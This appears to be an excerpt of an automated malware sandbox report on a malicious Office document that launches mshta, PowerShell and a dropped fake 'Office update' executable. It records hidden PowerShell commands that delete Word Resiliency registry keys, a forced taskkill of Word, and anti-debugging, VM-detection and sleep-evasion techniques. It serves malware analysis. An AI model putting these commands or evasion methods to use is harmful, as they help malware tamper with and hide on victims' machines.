Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

HIPS / PFW / Operating System Protection Evasion:

Uses taskkill to terminate processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\system32\taskkill.exe' /f /im winword.exe

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item -Path HKCU:\Software\Microsoft\Office\16.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\14.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\15.0\Word\Resiliency -recurse;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item -Path HKCU:\Software\Microsoft\Office\16.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\14.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\15.0\Word\Resiliency -recurse;

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Memory allocated: page read and write and page guard

Checks for debuggers (devices)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\en-US\filemgmt.dll.mui
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\filemgmt.dll

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

System information queried: KernelDebuggerInformation

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe

Code function: 24_2_008912FF rdtsc

24_2_008912FF

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Malware Analysis System Evasion:

Queries a list of all running drivers

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe

System information queried: ModuleInformation

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains capabilities to detect virtual machines

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe

Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe

Code function: 24_2_008912FF rdtsc

24_2_008912FF

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Enumerates the file system

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData\Roaming\Microsoft\Office
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData\Roaming
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData\Roaming\Microsoft

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\mshta.exe TID: 3548	Thread sleep time: -480000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 3548	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3640	Thread sleep time: -60s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3680	Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\taskkill.exe TID: 3804	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832	Thread sleep time: -90s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832	Thread sleep time: -60s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996	Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844	Thread sleep time: -60s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844	Thread sleep time: -60s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004	Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892	Thread sleep time: -90s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892	Thread sleep time: -60s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012	Thread sleep time: -922337203685477s >= -60s

Tries to detect sandboxes and other dynamic analysis tools (process name)

Show sources

Source: OfficeUpdte-KB9748956.exe

Binary or memory string: WINDBG.EXE

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
